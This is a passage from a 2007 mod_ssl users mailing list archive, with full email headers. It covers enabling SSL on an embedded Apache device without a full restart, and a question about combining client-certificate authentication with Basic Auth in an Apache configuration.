SIb3DQEBAQUABIGAe5xyYYGsfJ6+NkGPnbTwn2b2a9xwNz9z0AGg8K2vYiVj5JE2vFlvQADNFVHp
WLOhrmG/M82EMwJJpgaINJTnHJuTxT11UIVQ0RR7DylUHKpYhT6xHUxuDoVGXppqC9j3yEj+grpk
NZm8p6uTaOdNer39Z8qOwvt6yfAYRwPMVSIAAAAAAAA=

------=_NextPart_000_0046_01C7E303.D56D5DF0--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 24 03:45:54 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 5C16E14D89A; Fri, 24 Aug 2007 03:45:54 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web88309.mail.re4.yahoo.com (web88309.mail.re4.yahoo.com [216.39.53.232])
	by master.modssl.org (Postfix) with SMTP id 04A9A14D83F
	for ; Fri, 24 Aug 2007 03:45:52 +0200 (CEST)
Received: (qmail 24586 invoked by uid 60001); 24 Aug 2007 01:45:29 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=rogers.com;
  h=X-YMail-OSG:Received:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding:Message-ID;
  b=NakRHgcdtOfzIaMgHxwlMAY1yRt0+5EmgwXRxaLT+O72v2oL+3vBK51owen8bRI5nagBqknhsSTI5If6uwgS3NSw0A3mO2ABqDFqs4SL6jEWgymJjX7fHWDfD16DzSwGHIH9WwM34utNET75oIQwyZWoKU3s/Te46KHAxHuqdio=;
X-YMail-OSG: SLi0ytgVM1nlZ6xdSFMETbG.cUwgDJ_tUDW1ho95G75Rt1EnDGYu8w6PSUByyzQIPmWnxFgVdg--
Received: from [74.107.242.108] by web88309.mail.re4.yahoo.com via HTTP; Thu, 23 Aug 2007 21:45:29 EDT
Date: Thu, 23 Aug 2007 21:45:29 -0400 (EDT)
From: SANDER SMITH 
Subject: Adding SSL on-the-fly programmatically
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="0-544017290-1187919929=:22516"
Content-Transfer-Encoding: 8bit
Message-ID: <118383.22516.qm@web88309.mail.re4.yahoo.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: SANDER SMITH 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--0-544017290-1187919929=:22516
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit

I'm looking to do something, but I'm not sure it's even possible. Maybe someone can steer me in the right direction.
   
  Let's say that I have a copy of apache running on my server. I also have a brand new SSL certificate that was signed by a CA. I'd like to write some code to programmatically enable SSL on the server by means of mod_ssl. When I think about the steps necessary, I need to:
   
  1. Copy the mod_ssl files to the proper place.
  2. Update the mod_ssl config files to point to my SSL certificate.
  3. Update the apache config files to recognize and run mod_ssl
  4. Cause apache to suddenly start to use mod_ssl
   
  Now steps 1,2, and 3 seem pretty straight forward. Step 4 is a huge handwave, and I'm hoping someone can give me some insight. Is it even possible? Does it require apache to be restarted? Is there some programmatic way to get apache to restart?
   
   

--0-544017290-1187919929=:22516
Content-Type: text/html; charset=iso-8859-1
Content-Transfer-Encoding: 8bit


I'm looking to do something, but I'm not sure it's even possible. Maybe someone can steer me in the right direction.
  
 
  
Let's say that I have a copy of apache running on my server. I also have a brand new SSL certificate that was signed by a CA. I'd like to write some code to programmatically enable SSL on the server by means of mod_ssl. When I think about the steps necessary, I need to:
  
 
  
1. Copy the mod_ssl files to the proper place.
  
2. Update the mod_ssl config files to point to my SSL certificate.
  
3. Update the apache config files to recognize and run mod_ssl
  
4. Cause apache to suddenly start to use mod_ssl
  
 
  
Now steps 1,2, and 3 seem pretty straight forward. Step 4 is a huge handwave, and I'm hoping someone can give me some insight. Is it even possible? Does it require apache to be restarted? Is there some programmatic way to get apache to
 restart?
  
 
  
 

--0-544017290-1187919929=:22516--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 24 04:20:05 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id E9D8114D878; Fri, 24 Aug 2007 04:20:05 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from sceptre.pobox.com (sceptre.pobox.com [207.106.133.20])
	by master.modssl.org (Postfix) with ESMTP id 4A56E14D839
	for ; Fri, 24 Aug 2007 04:19:55 +0200 (CEST)
Received: from sceptre (localhost.localdomain [127.0.0.1])
	by sceptre.pobox.com (Postfix) with ESMTP id A19AA2EF
	for ; Thu, 23 Aug 2007 22:20:06 -0400 (EDT)
Received: from iXanax2.local (unknown [64.65.208.78])
	(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
	(No client certificate requested)
	by sceptre.sasl.smtp.pobox.com (Postfix) with ESMTP id 7C7BC74794
	for ; Thu, 23 Aug 2007 22:20:06 -0400 (EDT)
Message-ID: <46CE403D.9070700@w3works.com>
Date: Thu, 23 Aug 2007 22:19:41 -0400
From: Dave Paris 
User-Agent: Thunderbird 2.0.0.6 (Macintosh/20070728)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Adding SSL on-the-fly programmatically
References: <118383.22516.qm@web88309.mail.re4.yahoo.com>
In-Reply-To: <118383.22516.qm@web88309.mail.re4.yahoo.com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dave Paris 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This seems about 180deg from normal.  Install Apache with mod_ssl. 
Start it without invoking SSL .. if you get a certificate, you'll want 
to hand-walk it into the right place, chown it to root, and make it 
perm'd to 0400 anyway .. then a quick graceful stop and startssl .. 
*poof*, Bob's yer uncle.

Best~
-d

SANDER SMITH wrote:
> I'm looking to do something, but I'm not sure it's even possible. Maybe someone can steer me in the right direction.
>    
>   Let's say that I have a copy of apache running on my server. I also have a brand new SSL certificate that was signed by a CA. I'd like to write some code to programmatically enable SSL on the server by means of mod_ssl. When I think about the steps necessary, I need to:
>    
>   1. Copy the mod_ssl files to the proper place.
>   2. Update the mod_ssl config files to point to my SSL certificate.
>   3. Update the apache config files to recognize and run mod_ssl
>   4. Cause apache to suddenly start to use mod_ssl
>    
>   Now steps 1,2, and 3 seem pretty straight forward. Step 4 is a huge handwave, and I'm hoping someone can give me some insight. Is it even possible? Does it require apache to be restarted? Is there some programmatic way to get apache to restart?
>    
>    
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 24 13:50:52 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8E3FE14D89A; Fri, 24 Aug 2007 13:50:52 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web88308.mail.re4.yahoo.com (web88308.mail.re4.yahoo.com [216.39.53.231])
	by master.modssl.org (Postfix) with SMTP id CD73A14D839
	for ; Fri, 24 Aug 2007 13:50:51 +0200 (CEST)
Received: (qmail 72348 invoked by uid 60001); 24 Aug 2007 11:50:42 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=rogers.com;
  h=X-YMail-OSG:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding:Message-ID;
  b=6FC4a6zrrqUucQ92X1a/guiaCc/idSEwsM/NEGfI/Ab5g2FCcKk2hx6JDHNBBtb/hjEzNjQnZhqSrUwmuUJ0jjNpnJSgVjIlGL3V3bbliQfRjOnLdnzAGKxiGmc9gZ4SFW2nfzZDk5Tojp0Gb+YHs0gzA6O9KCka4w4s/d0KV5E=;
X-YMail-OSG: VNKlz3IVM1l.BQaB5e._f1LJVxNVCD1eqslnJhPOZiixuv1m2zIOAIDGEJIIveadOHDYoBPN4pvCu3s8w8mFlEdfWc2HDDT2J9A2.R6r0baQO5iAtY4-
Received: from [74.107.242.108] by web88308.mail.re4.yahoo.com via HTTP; Fri, 24 Aug 2007 07:50:42 EDT
Date: Fri, 24 Aug 2007 07:50:42 -0400 (EDT)
From: SANDER SMITH 
Subject: Re: Adding SSL on-the-fly programmatically
To: modssl-users@modssl.org
In-Reply-To: <46CE403D.9070700@w3works.com>
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="0-653303204-1187956242=:81457"
Content-Transfer-Encoding: 8bit
Message-ID: <837835.81457.qm@web88308.mail.re4.yahoo.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: SANDER SMITH 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--0-653303204-1187956242=:81457
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit

You're right, what I'm asking for is not normal and I understand it. However, your suggestions make some assumptions about the "normalcy" of the environment that we're dealing with which just isn't the reality of my situation.
   
  The project I'm working on is not to simply secure an e-commerce site running on some big server hardware. I'm looking at apache running on some embedded platform. Users will not be people who understand what chown is, but will be content by just pushing buttons on the front panel of the device. Because of how the device is being deployed, I can even assume that everything can be run under root to simplfy things.
   
  So given that this is not a normal case, any ideas on how to proceed?
  

Dave Paris  wrote:
  This seems about 180deg from normal. Install Apache with mod_ssl. 
Start it without invoking SSL .. if you get a certificate, you'll want 
to hand-walk it into the right place, chown it to root, and make it 
perm'd to 0400 anyway .. then a quick graceful stop and startssl .. 
*poof*, Bob's yer uncle.

Best~
-d

SANDER SMITH wrote:
> I'm looking to do something, but I'm not sure it's even possible. Maybe someone can steer me in the right direction.
> 
> Let's say that I have a copy of apache running on my server. I also have a brand new SSL certificate that was signed by a CA. I'd like to write some code to programmatically enable SSL on the server by means of mod_ssl. When I think about the steps necessary, I need to:
> 
> 1. Copy the mod_ssl files to the proper place.
> 2. Update the mod_ssl config files to point to my SSL certificate.
> 3. Update the apache config files to recognize and run mod_ssl
> 4. Cause apache to suddenly start to use mod_ssl
> 
> Now steps 1,2, and 3 seem pretty straight forward. Step 4 is a huge handwave, and I'm hoping someone can give me some insight. Is it even possible? Does it require apache to be restarted? Is there some programmatic way to get apache to restart?
> 
> 
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl) www.modssl.org
User Support Mailing List modssl-users@modssl.org
Automated List Manager majordomo@modssl.org


--0-653303204-1187956242=:81457
Content-Type: text/html; charset=iso-8859-1
Content-Transfer-Encoding: 8bit


You're right, what I'm asking for is not normal and I understand it. However, your suggestions make some assumptions about the "normalcy" of the environment that we're dealing with which just isn't the reality of my situation.
  
 
  
The project I'm working on is not to simply secure an e-commerce site running on some big server hardware. I'm looking at apache running on some embedded platform. Users will not be people who understand what chown is, but will be content by just pushing buttons on the front panel of the device. Because of how the device is being deployed, I can even assume that everything can be run under root to simplfy things.
  
 
  
So given that this is not a normal case, any ideas on how to proceed?
  


Dave Paris <dparis@w3works.com> wrote:
  
This seems about
 180deg from normal. Install Apache with mod_ssl. 
Start it without invoking SSL .. if you get a certificate, you'll want 
to hand-walk it into the right place, chown it to root, and make it 
perm'd to 0400 anyway .. then a quick graceful stop and startssl .. 
*poof*, Bob's yer uncle.

Best~
-d

SANDER SMITH wrote:
> I'm looking to do something, but I'm not sure it's even possible. Maybe someone can steer me in the right direction.
> 
> Let's say that I have a copy of apache running on my server. I also have a brand new SSL certificate that was signed by a CA. I'd like to write some code to programmatically enable SSL on the server by means of mod_ssl. When I think about the steps necessary, I need to:
> 
> 1. Copy the mod_ssl files to the proper place.
> 2. Update the mod_ssl config files to point to my SSL certificate.
> 3. Update the apache config files to recognize and run mod_ssl
> 4. Cause
 apache to suddenly start to use mod_ssl
> 
> Now steps 1,2, and 3 seem pretty straight forward. Step 4 is a huge handwave, and I'm hoping someone can give me some insight. Is it even possible? Does it require apache to be restarted? Is there some programmatic way to get apache to restart?
> 
> 
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl) www.modssl.org
User Support Mailing List modssl-users@modssl.org
Automated List Manager majordomo@modssl.org


--0-653303204-1187956242=:81457--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 24 15:01:07 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id B870014D875; Fri, 24 Aug 2007 15:01:07 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from sceptre.pobox.com (sceptre.pobox.com [207.106.133.20])
	by master.modssl.org (Postfix) with ESMTP id 0821C14D839
	for ; Fri, 24 Aug 2007 15:01:03 +0200 (CEST)
Received: from sceptre (localhost.localdomain [127.0.0.1])
	by sceptre.pobox.com (Postfix) with ESMTP id 4BCAE2F2
	for ; Fri, 24 Aug 2007 09:01:17 -0400 (EDT)
Received: from iXanax2.local (unknown [64.65.208.78])
	(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
	(No client certificate requested)
	by sceptre.sasl.smtp.pobox.com (Postfix) with ESMTP id 1CC48744E4
	for ; Fri, 24 Aug 2007 09:01:17 -0400 (EDT)
Message-ID: <46CED68A.6020000@w3works.com>
Date: Fri, 24 Aug 2007 09:00:58 -0400
From: Dave Paris 
User-Agent: Thunderbird 2.0.0.6 (Macintosh/20070728)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Adding SSL on-the-fly programmatically
References: <837835.81457.qm@web88308.mail.re4.yahoo.com>
In-Reply-To: <837835.81457.qm@web88308.mail.re4.yahoo.com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dave Paris 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Ok, so script the chown'ing and permissioning on import.  It's still 
easier on an embedded system to install apache as SSL-capable and only
enable when desired, rather than jumping through flaming hoops and 
loading up the mod_ssl module when needed.

Embedded devices are designed around the KISS principle. The more 
complex you make it, the surer you are to be getting loads of support calls.

Best~
-dsp

SANDER SMITH wrote:
> You're right, what I'm asking for is not normal and I understand it. However, your suggestions make some assumptions about the "normalcy" of the environment that we're dealing with which just isn't the reality of my situation.
>    
>   The project I'm working on is not to simply secure an e-commerce site running on some big server hardware. I'm looking at apache running on some embedded platform. Users will not be people who understand what chown is, but will be content by just pushing buttons on the front panel of the device. Because of how the device is being deployed, I can even assume that everything can be run under root to simplfy things.
>    
>   So given that this is not a normal case, any ideas on how to proceed?
>   
> 
> Dave Paris  wrote:
>   This seems about 180deg from normal. Install Apache with mod_ssl. 
> Start it without invoking SSL .. if you get a certificate, you'll want 
> to hand-walk it into the right place, chown it to root, and make it 
> perm'd to 0400 anyway .. then a quick graceful stop and startssl .. 
> *poof*, Bob's yer uncle.
> 
> Best~
> -d
> 
> SANDER SMITH wrote:
>> I'm looking to do something, but I'm not sure it's even possible. Maybe someone can steer me in the right direction.
>>
>> Let's say that I have a copy of apache running on my server. I also have a brand new SSL certificate that was signed by a CA. I'd like to write some code to programmatically enable SSL on the server by means of mod_ssl. When I think about the steps necessary, I need to:
>>
>> 1. Copy the mod_ssl files to the proper place.
>> 2. Update the mod_ssl config files to point to my SSL certificate.
>> 3. Update the apache config files to recognize and run mod_ssl
>> 4. Cause apache to suddenly start to use mod_ssl
>>
>> Now steps 1,2, and 3 seem pretty straight forward. Step 4 is a huge handwave, and I'm hoping someone can give me some insight. Is it even possible? Does it require apache to be restarted? Is there some programmatic way to get apache to restart?
>>
>>
>>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl) www.modssl.org
> User Support Mailing List modssl-users@modssl.org
> Automated List Manager majordomo@modssl.org
> 
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 24 15:57:03 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id D9A1914D885; Fri, 24 Aug 2007 15:57:03 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from opticatech.com (mail1.opticatech.com [63.253.105.122])
	by master.modssl.org (Postfix) with ESMTP id 4CC8414D839
	for ; Fri, 24 Aug 2007 15:57:02 +0200 (CEST)
Content-class: urn:content-classes:message
Subject: RE: Adding SSL on-the-fly programmatically
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C7E656.9F0AC7D8"
Date: Fri, 24 Aug 2007 07:56:49 -0600
X-MimeOLE: Produced By Microsoft Exchange V6.5
Message-ID: <116F1768869C4944A925A2A65CEE2E29750FB4@otisbs01.oti.local>
In-Reply-To: <118383.22516.qm@web88309.mail.re4.yahoo.com>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Adding SSL on-the-fly programmatically
Thread-Index: Acfl8JRdkNY95QAWTIGLLWaeTK4xHgAZZdBQ
References: <118383.22516.qm@web88309.mail.re4.yahoo.com>
From: "Bill Colvin" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Bill Colvin" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C7E656.9F0AC7D8
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

You may want to look at the command "apachectl graceful" for step 4.  It
gets the httpd threads to restart after they finish what they are doing.
So it is not too disruptive to existing activity.

=20

________________________________

From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of SANDER SMITH
Sent: August 23, 2007 9:45 PM
To: modssl-users@modssl.org
Subject: Adding SSL on-the-fly programmatically

=20

I'm looking to do something, but I'm not sure it's even possible. Maybe
someone can steer me in the right direction.

=20

Let's say that I have a copy of apache running on my server. I also have
a brand new SSL certificate that was signed by a CA. I'd like to write
some code to programmatically enable SSL on the server by means of
mod_ssl. When I think about the steps necessary, I need to:

=20

1. Copy the mod_ssl files to the proper place.

2. Update the mod_ssl config files to point to my SSL certificate.

3. Update the apache config files to recognize and run mod_ssl

4. Cause apache to suddenly start to use mod_ssl

=20

Now steps 1,2, and 3 seem pretty straight forward. Step 4 is a huge
handwave, and I'm hoping someone can give me some insight. Is it even
possible? Does it require apache to be restarted? Is there some
programmatic way to get apache to restart?

=20

=20


------_=_NextPart_001_01C7E656.9F0AC7D8
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

















You may want to look at the command =
“apachectl
graceful” for step 4.  It gets the httpd threads to restart =
after they
finish what they are doing.  So it is not too disruptive to =
existing activity.



 















From:
owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] =
On Behalf Of SANDER SMITH

Sent: August 23, 2007 =
9:45 PM

To: =
modssl-users@modssl.org

Subject: Adding SSL =
on-the-fly
programmatically






 






I'm looking to do something, but I'm not sure it's even =
possible. Maybe
someone can steer me in the right =
direction.









 









Let's say that I have a copy of apache running on my server. I =
also
have a brand new SSL certificate that was signed by a CA. I'd like =
to
write some code to programmatically enable SSL on the server by means of
mod_ssl. When I think about the steps necessary, I need =
to:









 









1. Copy the mod_ssl files to the proper =
place.









2. Update the mod_ssl config files to point to my SSL =
certificate.









3. Update the apache config files to recognize and run =
mod_ssl









4. Cause apache to suddenly start to use =
mod_ssl









 









Now steps 1,2, and 3 seem pretty straight forward. Step 4 is a =
huge
handwave, and I'm hoping someone can give me some insight. Is it even =
possible?
Does it require apache to be restarted? Is there some programmatic way =
to get
apache to restart?









 









 












------_=_NextPart_001_01C7E656.9F0AC7D8--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 24 17:03:11 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 6F96914D8B3; Fri, 24 Aug 2007 17:03:11 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web88309.mail.re4.yahoo.com (web88309.mail.re4.yahoo.com [216.39.53.232])
	by master.modssl.org (Postfix) with SMTP id 978E614D86B
	for ; Fri, 24 Aug 2007 17:03:10 +0200 (CEST)
Received: (qmail 19298 invoked by uid 60001); 24 Aug 2007 15:03:01 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=rogers.com;
  h=X-YMail-OSG:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding:Message-ID;
  b=6NaRoTPryVrDuFsLy84X/wPlkeoHGQadPw3qE0+xSDUgyapZX1+8vPDoUgzd9Qk3KkFU0r3tGRIwhmcx//yvmZyJtWX6uIDjLveDd2HKeMZGsBTd6vDoyeJnKsv0AXmh0l+mJOsi14OlNup2dB1tDC0IhGAq5HeSUvc15UH3AZ8=;
X-YMail-OSG: lnqxpn4VM1mkjC.NvdXRJhM9JiLfXJX7HFNetcCC7AlJnltCkqhqZhn2_Sooz4LMsQshyoHk6MVzx6HM0yAQG46eI0tKrJNRX75XPLP6ZUmVEi29dBUBNPfxgklrM6yL0QYBUiKHMSmWnNs-
Received: from [74.107.242.108] by web88309.mail.re4.yahoo.com via HTTP; Fri, 24 Aug 2007 11:03:01 EDT
Date: Fri, 24 Aug 2007 11:03:01 -0400 (EDT)
From: SANDER SMITH 
Subject: Re: Adding SSL on-the-fly programmatically
To: modssl-users@modssl.org
In-Reply-To: <46CED68A.6020000@w3works.com>
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="0-1019095939-1187967781=:18611"
Content-Transfer-Encoding: 8bit
Message-ID: <690447.18611.qm@web88309.mail.re4.yahoo.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: SANDER SMITH 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--0-1019095939-1187967781=:18611
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit

You're right, some of this stuff can be se up earlier.
   
  So what I'm really doing is receiving an SSL cert as a part of an HTTP request. Behind the scenes I've got an apache module or PHP running that will service it. It takes the cert, copies it to the right place, updates the config files to enable SSL, and then, ... what?
   
  I don't want to restart the device, because there are other things going on. I really only want to make apache aware of this config change, but I'm thinking there's no way to do that, is there? Alternatively, I guess I could restart apache, but how can I do that since I'm in the middle of servicing a request?
   
  

Dave Paris  wrote:
  Ok, so script the chown'ing and permissioning on import. It's still 
easier on an embedded system to install apache as SSL-capable and only
enable when desired, rather than jumping through flaming hoops and 
loading up the mod_ssl module when needed.

Embedded devices are designed around the KISS principle. The more 
complex you make it, the surer you are to be getting loads of support calls.

Best~
-dsp


--0-1019095939-1187967781=:18611
Content-Type: text/html; charset=iso-8859-1
Content-Transfer-Encoding: 8bit


You're right, some of this stuff can be se up earlier.
  
 
  
So what I'm really doing is receiving an SSL cert as a part of an HTTP request. Behind the scenes I've got an apache module or PHP running that will service it. It takes the cert, copies it to the right place, updates the config files to enable SSL, and then, ... what?
  
 
  
I don't want to restart the device, because there are other things going on. I really only want to make apache aware of this config change, but I'm thinking there's no way to do that, is there? Alternatively, I guess I could restart apache, but how can I do that since I'm in the middle of servicing a request?
  
 
  


Dave Paris <dparis@w3works.com> wrote:
  
Ok, so script the chown'ing and permissioning on import. It's still
 
easier on an embedded system to install apache as SSL-capable and only
enable when desired, rather than jumping through flaming hoops and 
loading up the mod_ssl module when needed.

Embedded devices are designed around the KISS principle. The more 
complex you make it, the surer you are to be getting loads of support calls.

Best~
-dsp


--0-1019095939-1187967781=:18611--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep  3 00:18:22 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 392D614D854; Mon,  3 Sep 2007 00:18:22 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from outbound03.telus.net (outbound03.telus.net [199.185.220.222])
	by master.modssl.org (Postfix) with ESMTP id 9DDFE14D82E
	for ; Mon,  3 Sep 2007 00:18:15 +0200 (CEST)
Received: from priv-edtnaa06.telusplanet.net ([137.186.246.196])
          by priv-edtnes86.telusplanet.net
          (InterMail vM.7.08.02.00 201-2186-121-20061213) with ESMTP
          id <20070902221805.PVGM19157.priv-edtnes86.telusplanet.net@priv-edtnaa06.telusplanet.net>
          for ; Sun, 2 Sep 2007 16:18:05 -0600
Received: from [192.168.2.100] (d137-186-246-196.abhsia.telus.net [137.186.246.196])
	by priv-edtnaa06.telusplanet.net (BorderWare MXtreme Infinity Mail Firewall) with ESMTP id AA07UWKWFW
	for ; Sun,  2 Sep 2007 16:18:04 -0600 (MDT)
Message-ID: <46DB36A3.1070509@daltons.ca>
Date: Sun, 02 Sep 2007 16:18:11 -0600
From: Aaron Dalton 
User-Agent: Thunderbird 2.0.0.6 (Windows/20070728)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: SSL + Basic Auth
X-Enigmail-Version: 0.95.3
OpenPGP: id=8811D2A4;
	url=https://biglumber.com/x/web?qs=8811d2a4
Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary="------------ms030309060906060501050007"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Aaron Dalton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a cryptographically signed message in MIME format.

--------------ms030309060906060501050007
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit

I am trying to setup a RESTful web service where GET is open to all but
POST, PUT, and DELETE are restricted to authorized users.  I have a
database of users that is checked using Basic Auth.  So far, so good.  I
*also* want to make it possible to issue certificates (from a
home-rolled CA) to users if they wish, so they can bypass the
username/password dialogues.  Try as I might, I simply cannot get an
either/or setup working where certs are checked and basic auth is
skipped if a valid cert is found.  No matter what, the Basic Auth dialog
always appears.  It also appears that the  directive does not
work with RequireSSL directives?  Is there a way to limit only certain
methods using SSL?  I've tried +FakeBasicAuth but then the database
lookup code rejects the username (of course).  Here's what my config
looks like right now.  I would really appreciate any pointers or
suggestions.  Thanks so much for your time.

--BEGIN CONFIG--

	SSLOptions +StdEnvVars
	AllowOverride all
	Order deny,allow
	Allow from all
	Satisfy any

	SSLRequireSSL
	SSLRequire           %{SSL_CIPHER_USEKEYSIZE} >= 128
	SSLRequire ( \
		%{SSL_CLIENT_S_DN_O} eq "Super Duper Games" \
		and %{SSL_CLIENT_S_DN_OU} eq "REST Server" \
	)


	AuthType	Basic
	AuthBasicProvider dbd
	AuthDBDUserPWQuery "SELECT encrypt(password) FROM users WHERE username=%s"
	AuthName	 "Super Duper Games"

	
		Require		valid-user
	

--END CONFIG--

-- 
Aaron Dalton       |   Super Duper Games
aaron@daltons.ca   |   http://superdupergames.org

--------------ms030309060906060501050007
Content-Type: application/x-pkcs7-signature; name="smime.p7s"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="smime.p7s"
Content-Description: S/MIME Cryptographic Signature

MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIISOjCC
BggwggPwoAMCAQICAQEwDQYJKoZIhvcNAQEEBQAweTEQMA4GA1UEChMHUm9vdCBDQTEeMBwG
A1UECxMVaHR0cDovL3d3dy5jYWNlcnQub3JnMSIwIAYDVQQDExlDQSBDZXJ0IFNpZ25pbmcg
QXV0aG9yaXR5MSEwHwYJKoZIhvcNAQkBFhJzdXBwb3J0QGNhY2VydC5vcmcwHhcNMDUxMDE0
MDczNjU1WhcNMzMwMzI4MDczNjU1WjBUMRQwEgYDVQQKEwtDQWNlcnQgSW5jLjEeMBwGA1UE
CxMVaHR0cDovL3d3dy5DQWNlcnQub3JnMRwwGgYDVQQDExNDQWNlcnQgQ2xhc3MgMyBSb290
MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAq0k1EUh80iZ+U5TPQ6ndKNdCKovz
h3gZWHwPntqJfeH763KQDXShlmSrn6AkmXPa4lV2xxd79QSsRrjDvn9kjRBsJPNhnMDykPpR
